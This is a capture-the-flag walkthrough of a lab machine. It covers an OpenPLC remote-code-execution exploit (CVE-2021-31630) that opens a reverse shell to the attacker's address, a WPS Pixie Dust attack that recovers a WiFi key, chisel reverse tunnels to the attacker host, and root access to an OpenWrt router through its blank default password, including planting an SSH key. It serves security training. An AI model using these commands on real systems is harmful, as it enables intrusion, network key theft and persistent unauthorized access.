Week 11. WifineticTwo
TL;DR
This is a nice Linux machine that resembles an IT and hardware pentesting scenario, where the goal is rooting a WiFi access point. For the IT part we have to root a machine by exploiting a vulnerability (CVE-2021-31630) in an OpenPLC server, this will be enough for the user flag. Later, for the privilege escalation part, the machine developers have set in place a cool WiFi virtualization environment. First we attack the WiFi with OneShot, which will enable us to obtain the WPA-PSK network key. Once inside the WLAN, access to the WiFi AP is gained by abusing a security misconfiguration related to the root account in the AP embedded Linux (OpenWRT).
KEYWORDS
OpenPLC, CVE-2021-31630, WiFi, WPA-PSK, WPS, OneShot, Pixie Dust attack, OpenWRT.
REFERENCES
https://autonomylogic.com/docs/2-1-openplc-runtime-overview
https://www.cvedetails.com/cve/CVE-2021-31630
https://www.exploit-db.com/exploits/49803
https://unix.stackexchange.com/questions/283722/how-to-connect-to-wifi-from-command-line
https://miloserdov.org/?p=3393
https://github.com/kimocoder/OneShot
https://openwrt.org/docs/guide-quick-start/walkthrough_login
ENUMERATION
Port scan.
> nmap $target -p- --min-rate=5000 -Pn --open --reason
Starting Nmap 7.93 ( https://nmap.org ) at 2024-03-17 16:07 EDT
Nmap scan report for 10.10.11.7
Host is up, received user-set (0.11s latency).
Not shown: 52303 closed tcp ports (conn-refused), 13230 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE REASON
22/tcp open ssh syn-ack
8080/tcp open http-proxy syn-ack
Nmap done: 1 IP address (1 host up) scanned in 18.78 secondsEnumerate the open ports.
> nmap $target -p22,8080 -sV -sC -Pn -vv -n
Starting Nmap 7.93 ( https://nmap.org ) at 2024-03-17 16:11 EDT
Nmap scan report for 10.10.11.7
Host is up, received user-set (0.12s latency).
Scanned at 2024-03-17 16:11:11 EDT for 21s
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 48add5b83a9fbcbef7e8201ef6bfdeae (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQC82vTuN1hMqiqUfN+Lwih4g8rSJjaMjDQdhfdT8vEQ67urtQIyPszlNtkCDn6MNcBfibD/7Zz4r8lr1iNe/Afk6LJqTt3OWewzS2a1TpCrEbvoileYAl/Feya5PfbZ8mv77+MWEA+kT0pAw1xW9bpkhYCGkJQm9OYdcsEEg1i+kQ/ng3+GaFrGJjxqYaW1LXyXN1f7j9xG2f27rKEZoRO/9HOH9Y+5ru184QQXjW/ir+lEJ7xTwQA5U1GOW1m/AgpHIfI5j9aDfT/r4QMe+au+2yPotnOGBBJBz3ef+fQzj/Cq7OGRR96ZBfJ3i00B/Waw/RI19qd7+ybNXF/gBzptEYXujySQZSu92Dwi23itxJBolE6hpQ2uYVA8VBlF0KXESt3ZJVWSAsU3oguNCXtY7krjqPe6BZRy+lrbeska1bIGPZrqLEgptpKhz14UaOcH9/vpMYFdSKr24aMXvZBDK1GJg50yihZx8I9I367z0my8E89+TnjGFY2QTzxmbmU=
| 256 b7896c0b20ed49b2c1867c2992741c1f (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBH2y17GUe6keBxOcBGNkWsliFwTRwUtQB3NXEhTAFLziGDfCgBV7B9Hp6GQMPGQXqMk7nnveA8vUz0D7ug5n04A=
| 256 18cd9d08a621a8b8b6f79f8d405154fb (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIKfXa+OM5/utlol5mJajysEsV4zb/L0BJ1lKxMPadPvR
8080/tcp open http-proxy syn-ack Werkzeug/1.0.1 Python/2.7.18
| http-title: Site doesn't have a title (text/html; charset=utf-8).
|_Requested resource was http://10.10.11.7:8080/login
| http-methods:
|_ Supported Methods: HEAD OPTIONS GET
|_http-server-header: Werkzeug/1.0.1 Python/2.7.18
| fingerprint-strings:
| FourOhFourRequest:
| HTTP/1.0 404 NOT FOUND
| content-type: text/html; charset=utf-8
| content-length: 232
| vary: Cookie
| set-cookie: session=eyJfcGVybWFuZW50Ijp0cnVlfQ.ZfdObg.94hXN2L08gucOGoFN7e97U_38Tw; Expires=Sun, 17-Mar-2024 20:16:26 GMT; HttpOnly; Path=/
| server: Werkzeug/1.0.1 Python/2.7.18
| date: Sun, 17 Mar 2024 20:11:26 GMT
| <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
| <title>404 Not Found</title>
| <h1>Not Found</h1>
| <p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
| GetRequest:
| HTTP/1.0 302 FOUND
| content-type: text/html; charset=utf-8
| content-length: 219
| location: http://0.0.0.0:8080/login
| vary: Cookie
| set-cookie: session=eyJfZnJlc2giOmZhbHNlLCJfcGVybWFuZW50Ijp0cnVlfQ.ZfdObg.8A54Fk8PNQ5iFScDuWIE8yZuJmw; Expires=Sun, 17-Mar-2024 20:16:26 GMT; HttpOnly; Path=/
| server: Werkzeug/1.0.1 Python/2.7.18
| date: Sun, 17 Mar 2024 20:11:26 GMT
| <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
| <title>Redirecting...</title>
| <h1>Redirecting...</h1>
| <p>You should be redirected automatically to target URL: <a href="/login">/login</a>. If not click the link.
| HTTPOptions:
| HTTP/1.0 200 OK
| content-type: text/html; charset=utf-8
| allow: HEAD, OPTIONS, GET
| vary: Cookie
| set-cookie: session=eyJfcGVybWFuZW50Ijp0cnVlfQ.ZfdObg.94hXN2L08gucOGoFN7e97U_38Tw; Expires=Sun, 17-Mar-2024 20:16:26 GMT; HttpOnly; Path=/
| content-length: 0
| server: Werkzeug/1.0.1 Python/2.7.18
| date: Sun, 17 Mar 2024 20:11:26 GMT
| RTSPRequest:
| HTTP/1.1 400 Bad request
| content-length: 90
| cache-control: no-cache
| content-type: text/html
| connection: close
| <html><body><h1>400 Bad request</h1>
| Your browser sent an invalid request.
|_ </body></html>
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port8080-TCP:V=7.93%I=7%D=3/17%Time=65F74E65%P=x86_64-pc-linux-gnu%r(Ge
SF:tRequest,24C,"HTTP/1\.0\x20302\x20FOUND\r\ncontent-type:\x20text/html;\
SF:x20charset=utf-8\r\ncontent-length:\x20219\r\nlocation:\x20http://0\.0\
SF:.0\.0:8080/login\r\nvary:\x20Cookie\r\nset-cookie:\x20session=eyJfZnJlc
SF:2giOmZhbHNlLCJfcGVybWFuZW50Ijp0cnVlfQ\.ZfdObg\.8A54Fk8PNQ5iFScDuWIE8yZu
SF:Jmw;\x20Expires=Sun,\x2017-Mar-2024\x2020:16:26\x20GMT;\x20HttpOnly;\x2
SF:0Path=/\r\nserver:\x20Werkzeug/1\.0\.1\x20Python/2\.7\.18\r\ndate:\x20S
SF:un,\x2017\x20Mar\x202024\x2020:11:26\x20GMT\r\n\r\n<!DOCTYPE\x20HTML\x2
SF:0PUBLIC\x20\"-//W3C//DTD\x20HTML\x203\.2\x20Final//EN\">\n<title>Redire
SF:cting\.\.\.</title>\n<h1>Redirecting\.\.\.</h1>\n<p>You\x20should\x20be
SF:\x20redirected\x20automatically\x20to\x20target\x20URL:\x20<a\x20href=\
SF:"/login\">/login</a>\.\x20\x20If\x20not\x20click\x20the\x20link\.")%r(H
SF:TTPOptions,14E,"HTTP/1\.0\x20200\x20OK\r\ncontent-type:\x20text/html;\x
SF:20charset=utf-8\r\nallow:\x20HEAD,\x20OPTIONS,\x20GET\r\nvary:\x20Cooki
SF:e\r\nset-cookie:\x20session=eyJfcGVybWFuZW50Ijp0cnVlfQ\.ZfdObg\.94hXN2L
SF:08gucOGoFN7e97U_38Tw;\x20Expires=Sun,\x2017-Mar-2024\x2020:16:26\x20GMT
SF:;\x20HttpOnly;\x20Path=/\r\ncontent-length:\x200\r\nserver:\x20Werkzeug
SF:/1\.0\.1\x20Python/2\.7\.18\r\ndate:\x20Sun,\x2017\x20Mar\x202024\x2020
SF::11:26\x20GMT\r\n\r\n")%r(RTSPRequest,CF,"HTTP/1\.1\x20400\x20Bad\x20re
SF:quest\r\ncontent-length:\x2090\r\ncache-control:\x20no-cache\r\ncontent
SF:-type:\x20text/html\r\nconnection:\x20close\r\n\r\n<html><body><h1>400\
SF:x20Bad\x20request</h1>\nYour\x20browser\x20sent\x20an\x20invalid\x20req
SF:uest\.\n</body></html>\n")%r(FourOhFourRequest,224,"HTTP/1\.0\x20404\x2
SF:0NOT\x20FOUND\r\ncontent-type:\x20text/html;\x20charset=utf-8\r\nconten
SF:t-length:\x20232\r\nvary:\x20Cookie\r\nset-cookie:\x20session=eyJfcGVyb
SF:WFuZW50Ijp0cnVlfQ\.ZfdObg\.94hXN2L08gucOGoFN7e97U_38Tw;\x20Expires=Sun,
SF:\x2017-Mar-2024\x2020:16:26\x20GMT;\x20HttpOnly;\x20Path=/\r\nserver:\x
SF:20Werkzeug/1\.0\.1\x20Python/2\.7\.18\r\ndate:\x20Sun,\x2017\x20Mar\x20
SF:2024\x2020:11:26\x20GMT\r\n\r\n<!DOCTYPE\x20HTML\x20PUBLIC\x20\"-//W3C/
SF:/DTD\x20HTML\x203\.2\x20Final//EN\">\n<title>404\x20Not\x20Found</title
SF:>\n<h1>Not\x20Found</h1>\n<p>The\x20requested\x20URL\x20was\x20not\x20f
SF:ound\x20on\x20the\x20server\.\x20If\x20you\x20entered\x20the\x20URL\x20
SF:manually\x20please\x20check\x20your\x20spelling\x20and\x20try\x20again\
SF:.</p>\n");
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Nmap done: 1 IP address (1 host up) scanned in 21.31 secondsEnumerate the port 8080 with Firefox, an OpenPLC web server appears.
Default credentials are available in the online documentation (https://autonomylogic.com/docs/2-1-openplc-runtime-overview).
Use them to login, the user dashboard appears.
According to the documentation, the OpenPLC webserver runs PLC programs created on the OpenPLC editor tool, and the web server dashboard allows the user to configure several parameters of the runtime. At this moment we see in the dashboard the loaded file is called blank_program.st and the server is stopped.
USER
If you look for OpenPLC vulnerabilities you'll find this one: https://www.cvedetails.com/cve/CVE-2021-31630, and this PoC: https://www.exploit-db.com/exploits/49803
The PoC provides RCE when run against the host, it just needs passing user credentials as argument. Before it, change the file name in the compile_program in the code to match the file currently loaded in the host OpenPLC.
Start a listener and fire the exploit.
> python3 49803.py -u http://$target:8080 -l openplc -p openplc -i 10.10.xxx.xxx -r 1919
[+] Remote Code Execution on OpenPLC_v3 WebServer
[+] Checking if host http://10.10.11.7:8080 is Up...
[+] Host Up! ...
[+] Trying to authenticate with credentials openplc:openplc
[+] Login success!
[+] PLC program uploading...
[+] Attempt to Code injection...
[+] Spawning Reverse Shell...
[+] Failed to receive connection :(A reverse shell is successfully received on port 1919 (although the script reports it failed to receive a connection).
Which can be used to retrieve the user flag (in the /root directory).
ROOT
Start from the root shell obtained with the exploit and upgrade the shell.
> python3 -c 'import pty;pty.spawn("/bin/bash");'
root@attica02:/bin#
zsh: suspended rlwrap -cAr nc -lvp 1919
> stty raw -echo;fg
[1] + continued rlwrap -cAr nc -lvp 1919
> export TERM=xterm
> export SHELL=bash
root@attica02:/bin# clearEnumerate the system.
> uname -a
Linux attica02 5.4.0-173-generic #191-Ubuntu SMP Fri Feb 2 13:55:07 UTC 2024 x86_64 x86_64 x86_64 GNU/LinuxWe have root privileges on this machine, but still do not have access to the root.txt flag, meaning we will probably need to move laterally to another machine. For this we will need to do configuration changes on this machine (and this is why we are root).
Having a look at the machine's name, there is probably something related to the wireless network configuration. Let's enumerate the network interfaces.
> ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 10.0.3.3 netmask 255.255.255.0 broadcast 10.0.3.255
inet6 fe80::216:3eff:fefb:30c8 prefixlen 64 scopeid 0x20<link>
ether 00:16:3e:fb:30:c8 txqueuelen 1000 (Ethernet)
RX packets 4094 bytes 367954 (367.9 KB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 3166 bytes 935088 (935.0 KB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (Local Loopback)
RX packets 5 bytes 288 (288.0 B)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 5 bytes 288 (288.0 B)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
wlan0: flags=4099<UP,BROADCAST,MULTICAST> mtu 1500
ether 02:00:00:00:03:00 txqueuelen 1000 (Ethernet)
RX packets 0 bytes 0 (0.0 B)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 0 bytes 0 (0.0 B)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0There is a wireless network interface wlan0, check its configuration.
> iwconfig
wlan0 IEEE 802.11 ESSID:off/any
Mode:Managed Access Point: Not-Associated Tx-Power=20 dBm
Retry short limit:7 RTS thr:off Fragment thr:off
Encryption key:off
Power Management:on
lo no wireless extensions.
eth0 no wireless extensions.Having root access to the machine enables us to make configuration changes on the wireless configuration, meaning the machine is running some kind of cool WiFi virtualization.
There are online tutorials on WiFi management from command line here: https://askubuntu.com/questions/16584/how-to-connect-and-disconnect-to-a-network-manually-in-terminal, and here: https://unix.stackexchange.com/questions/283722/how-to-connect-to-wifi-from-command-line
Let's start scanning for available WiFi networks.
> iw dev wlan0 scan
BSS 02:00:00:00:01:00(on wlan0)
last seen: 1842.216s [boottime]
TSF: 1710758388354172 usec (19800d, 10:39:48)
freq: 2412
beacon interval: 100 TUs
capability: ESS Privacy ShortSlotTime (0x0411)
signal: -30.00 dBm
last seen: 0 ms ago
Information elements from Probe Response frame:
SSID: plcrouter
Supported rates: 1.0* 2.0* 5.5* 11.0* 6.0 9.0 12.0 18.0
DS Parameter set: channel 1
ERP: Barker_Preamble_Mode
Extended supported rates: 24.0 36.0 48.0 54.0
RSN: * Version: 1
* Group cipher: CCMP
* Pairwise ciphers: CCMP
* Authentication suites: PSK
* Capabilities: 1-PTKSA-RC 1-GTKSA-RC (0x0000)
Supported operating classes:
* current operating class: 81
Extended capabilities:
* Extended Channel Switching
* SSID List
* Operating Mode Notification
WPS: * Version: 1.0
* Wi-Fi Protected Setup State: 2 (Configured)
* Response Type: 3 (AP)
* UUID: 572cf82f-c957-5653-9b16-b5cfb298abf1
* Manufacturer:
* Model:
* Model Number:
* Serial Number:
* Primary Device Type: 0-00000000-0
* Device name:
* Config methods: Label, Display, Keypad
* Version2: 2.0We see there is a WiFi called plcrouter in range, and has WPS mode enabled. The BSSID is 02:00 :00:00:01:00
Since WPS is enabled we could try an OneShot attack, which is a WPS attack issued from network interfaces in managed mode. More info here: https://en.kali.tools/?p=1002, and here: https://miloserdov.org/?p=3393
You can find a Python OneShot script here: https://github.com/kimocoder/OneShot. We will use it to fire a Pixie Dust attack following the tutorials in the links provided.
> python3 ./oneshot.py -i wlan0 -b 02:00:00:00:01:00 -K
[*] Running wpa_supplicant…
[*] Running wpa_supplicant…
[*] Trying PIN '12345670'…
[*] Scanning…
[*] Authenticating…
[+] Authenticated
[*] Associating with AP…
[+] Associated with 02:00:00:00:01:00 (ESSID: plcrouter)
[*] Received Identity Request
[*] Sending Identity Response…
[*] Received WPS Message M1
[P] E-Nonce: B387B12DA58D3988CD0491D083A31A70
[*] Sending WPS Message M2…
[P] PKR: A06A1B4B0155CEA8AC6F0CC6CCBF9ED9D7714542792D9A182A306D548E959741C8D3D507AE303CE620CDC3A9F445C1A2634D4FC7AC9B45B1AC5144E57751D47EC54585DA543E7B7D20391266B02B6C39FA4AC312C6BBF8AC3DC2C069C5FEF815AF74BF40CF19688839588CB4CC971D16CCB47D419C1DEF696A1BB9328AC185283CF8100E826B10436511E82FCDA408A7ADE606FB9BDFB2F21CE372ADE42B5AB0CD916F6BADF98C41B9215F1758BA5260ADAEC38EDD5170F3113FC5D2F173BC79
[P] PKE: 4CF6D2826003A57CB09BAC2A9C6C405354E9E30169E9FE950B2E1B78833E024825B8DED5281BF333625E80D55F89E0219DAB96C994FFA6966C659DD8B4E25C6AD56C335130E949F3696B6AC7AFB13864C27AD148E63582EBEDAD94A6EE5B2F5FE4F96352A37652D98B162093338CFFCC298A7318CB0E4987F81489C9EC1E9B710C1746BCE8153D80AE60660C2F4D671582FC5BC80EB86BF9998B1A16B58ABE9B6EEB278603E4C6CCDBAC32B260274BDABAC60417B6317A2E81694A8DCE91ACDF
[P] AuthKey: 87FB35E66A0717C49994D3D6EE9E9416EE2C4CD9370C8AF98F20858C0AC422AD
[*] Received WPS Message M3
[P] E-Hash1: B0C833682D3439D234768B45CC4E3B83B42124A7C13CD3396517E96E009ED53D
[P] E-Hash2: C435645B234ECEA0D7EFD9B3E2088E29E3DC6EC728A4F3FE9CEF9FC28769EF90
[*] Sending WPS Message M4…
[*] Received WPS Message M5
[+] The first half of the PIN is valid
[*] Sending WPS Message M6…
[*] Received WPS Message M7
[+] WPS PIN: '12345670'
[+] WPA PSK: 'NoWWEDoKnowWhaTisReal123!'
[+] AP SSID: 'plcrouter'The script dumps the WPA-PSK key. Connect to the WiFi from command line as indicated in the links provided.
> wpa_passphrase 'plcrouter' 'NoWWEDoKnowWhaTisReal123!' > wpa.conf
> cat config.conf
network={
ssid="plcrouter"
#psk="NoWWEDoKnowWhaTisReal123!"
psk=2bafe4e17630ef1834eaa9fa5c4d81fa5ef093c4db5aac5c03f1643fef02d156
}
> wpa_supplicant -B -c wpa.conf -i wlan0
Successfully initialized wpa_supplicant
rfkill: Cannot open RFKILL control device
rfkill: Cannot get wiphy information
nl80211: Could not set interface 'p2p-dev-wlan0' UP
nl80211: deinit ifname=p2p-dev-wlan0 disabled_11b_rates=0
p2p-dev-wlan0: Failed to initialize driver interface
p2p-dev-wlan0: CTRL-EVENT-DSCP-POLICY clear_all
P2P: Failed to enable P2P Device interfaceVerify the wireless configuration is correctly loaded. If not, repeat the wpa_supplicant command again.
> iwconfig
wlan0 IEEE 802.11 ESSID:"plcrouter"
Mode:Managed Frequency:2.412 GHz Access Point: 02:00:00:00:01:00
Bit Rate:18 Mb/s Tx-Power=20 dBm
Retry short limit:7 RTS thr:off Fragment thr:off
Encryption key:off
Power Management:on
Link Quality=70/70 Signal level=-30 dBm
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
Tx excessive retries:0 Invalid misc:6 Missed beacon:0
eth0 no wireless extensions.
lo no wireless extensions.Verify the network interface configuration.
> ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 10.0.3.3 netmask 255.255.255.0 broadcast 10.0.3.255
inet6 fe80::216:3eff:fefb:30c8 prefixlen 64 scopeid 0x20<link>
ether 00:16:3e:fb:30:c8 txqueuelen 1000 (Ethernet)
RX packets 591 bytes 60515 (60.5 KB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 278 bytes 204117 (204.1 KB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (Local Loopback)
RX packets 5 bytes 288 (288.0 B)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 5 bytes 288 (288.0 B)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
wlan0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet6 fe80::ff:fe00:300 prefixlen 64 scopeid 0x20<link>
ether 02:00:00:00:03:00 txqueuelen 1000 (Ethernet)
RX packets 2 bytes 282 (282.0 B)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 9 bytes 996 (996.0 B)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0Although we have correctly associated with the WiFi AP, we haven't been assigned an IP address by the DHCP service. Assign yourself an IP address corresponding to a typical private class C network with 255.255.255.0 mask.
> ifconfig wlan0 192.168.1.100 netmask 255.255.255.0
> ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 10.0.3.3 netmask 255.255.255.0 broadcast 10.0.3.255
inet6 fe80::216:3eff:fefb:30c8 prefixlen 64 scopeid 0x20<link>
ether 00:16:3e:fb:30:c8 txqueuelen 1000 (Ethernet)
RX packets 8057 bytes 11274256 (11.2 MB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 3992 bytes 492270 (492.2 KB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (Local Loopback)
RX packets 5 bytes 288 (288.0 B)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 5 bytes 288 (288.0 B)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
wlan0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 192.168.1.100 netmask 255.255.255.0 broadcast 192.168.1.255
inet6 fe80::ff:fe00:300 prefixlen 64 scopeid 0x20<link>
ether 02:00:00:00:03:00 txqueuelen 1000 (Ethernet)
RX packets 2 bytes 282 (282.0 B)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 34 bytes 3520 (3.5 KB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0Once inside the WLAN we will enumerate the network; for this, transfer an standalone nmap64 package to the host. Unpack the binaries and fire a ping sweep to discover network nodes.
> ./nmap -sn 192.168.1.0/24
Starting Nmap 7.91 ( https://nmap.org ) at 2024-03-19 11:14 UTC
Nmap scan report for 192.168.1.1
Host is up (0.00015s latency).
MAC Address: 02:00:00:00:01:00 (Unknown)
Nmap scan report for 192.168.1.100
Host is up.
Nmap done: 256 IP addresses (2 hosts up) scanned in 27.95 secondsThere are 2 hosts, the gateway (192.168.1.1) and our machine (192.168.1.100). Enumerate the AP ports.
> ./nmap 192.168.1.1 -p-
Starting Nmap 7.91 ( https://nmap.org ) at 2024-03-19 11:15 UTC
Nmap scan report for 192.168.1.1
Host is up (0.000016s latency).
Not shown: 65531 closed ports
PORT STATE SERVICE
22/tcp open ssh
53/tcp open domain
80/tcp open http
443/tcp open https
MAC Address: 02:00:00:00:01:00 (Unknown)
Nmap done: 1 IP address (1 host up) scanned in 11.73 secondsLet's do a quick enumeration of the HTTP/HTTPS open ports.
> curl http://192.168.1.1
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Cache-Control" content="no-cache, no-store, must-revalidate" />
<meta http-equiv="Pragma" content="no-cache" />
<meta http-equiv="Expires" content="0" />
<meta http-equiv="refresh" content="0; URL=cgi-bin/luci/" />
<style type="text/css">
body { background: white; font-family: arial, helvetica, sans-serif; }
a { color: black; }
@media (prefers-color-scheme: dark) {
body { background: black; }
a { color: white; }
}
</style>
</head>
<body>
<a href="cgi-bin/luci/">LuCI - Lua Configuration Interface</a>
</body>
</html>
> curl -k https://192.168.1.1
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Cache-Control" content="no-cache, no-store, must-revalidate" />
<meta http-equiv="Pragma" content="no-cache" />
<meta http-equiv="Expires" content="0" />
<meta http-equiv="refresh" content="0; URL=cgi-bin/luci/" />
<style type="text/css">
body { background: white; font-family: arial, helvetica, sans-serif; }
a { color: black; }
@media (prefers-color-scheme: dark) {
body { background: black; }
a { color: white; }
}
</style>
</head>
<body>
<a href="cgi-bin/luci/">LuCI - Lua Configuration Interface</a>
</body>
</html>A quick Google search reveals LuCI stands for LUA Configuration Interface, a web-based user interface designed for embedded devices (https://launchpad.net/luci). It is usually part of OpenWRT, an open source Linux operating system for embedded devices (
Place a chisel so we can get access to the LuCI portal from Kali.
# In Kali
> ./chisel64 server -p 8000 --reverse
2024/03/19 08:23:23 server: Reverse tunnelling enabled
2024/03/19 08:23:23 server: Fingerprint LeXOj0P8rhHkm92GNXNnmgVzSDfXjXj3Pbls+4zKqJQ=
2024/03/19 08:23:23 server: Listening on http://0.0.0.0:8000
2024/03/19 08:24:18 server: session#1: tun: proxy#R:80=>192.168.1.1:80: Listening
# In the victim host
> ./chisel64 client 10.10.xxx.xxx:8000 R:80:192.168.1.1:80
2024/03/19 12:28:07 client: Connecting to ws://10.10.14.86:8000
2024/03/19 12:28:08 client: Connected (Latency 80.200421ms)Now browse the web page from Kali, a welcome login portal appears.
In the documentation (https://openwrt.org/docs/guide-quick-start/walkthrough_login) you can find the default login for root (root:<blank password>).
Navigate to System -> Administration. Here you can configure the router root password, SSH access and SSH keys. For example, configure the SSH settings, make sure port 22 and root access are both enabled.
In the "Router Password" tab you can change the root SSH password and log in, or you can just use the credential you used to log into the router to open an SSH connection.
> ssh root@192.168.1.1
BusyBox v1.36.1 (2023-11-14 13:38:11 UTC) built-in shell (ash)
_______ ________ __
| |.-----.-----.-----.| | | |.----.| |_
| - || _ | -__| || | | || _|| _|
|_______|| __|_____|__|__||________||__| |____|
|__| W I R E L E S S F R E E D O M
-----------------------------------------------------
OpenWrt 23.05.2, r23630-842932a63d
-----------------------------------------------------
=== WARNING! =====================================
There is no root password defined on this device!
Use the "passwd" command to set up a new password
in order to prevent unauthorized SSH logins.
--------------------------------------------------You are root.
ALT. ENDING
The router configuration allows the user to add his own RSA public key for SSH logins. For this we need to put in place a socks chisel port forwarding.
# in kali
./chisel64 server -p 8000 --reverse
2024/03/19 10:40:20 server: Reverse tunnelling enabled
2024/03/19 10:40:20 server: Fingerprint Tf9ieIbsyLF+/H6CnawpyMirigr0ZzzYUdkRb/ggiT8=
2024/03/19 10:40:20 server: Listening on http://0.0.0.0:8000
2024/03/19 10:41:18 server: session#1: tun: proxy#R:127.0.0.1:8081=>socks: Listening
# in the victim host
./chisel64 client 10.10.xxx.xxx:8000 R:8081:socks
2024/03/19 14:41:48 client: Connecting to ws://10.10.14.86:8000
2024/03/19 14:41:49 client: Connected (Latency 79.901731ms)Modify the proxychains configuration accordingly.
> cat /etc/proxychains.conf
[ProxyList]
# add proxy here ...
# meanwile
# defaults set to "tor"
#socks4 127.0.0.1 1081
socks5 127.0.0.1 8081Enable Firefox proxy on port 8081, and navigate to http://192.168.1.1, so the HTTP traffic is forwarded through the socks tunnel.
Add your public key in System -> Administration -> SSH keys
Finally, in the "SSH Access" tab, uncheck the "Login with password" options.
Now you can login from Kali anytime without knowing the root password. Open an SSH session without password prompt using proxychains and your private key.
You are root again.
Last updated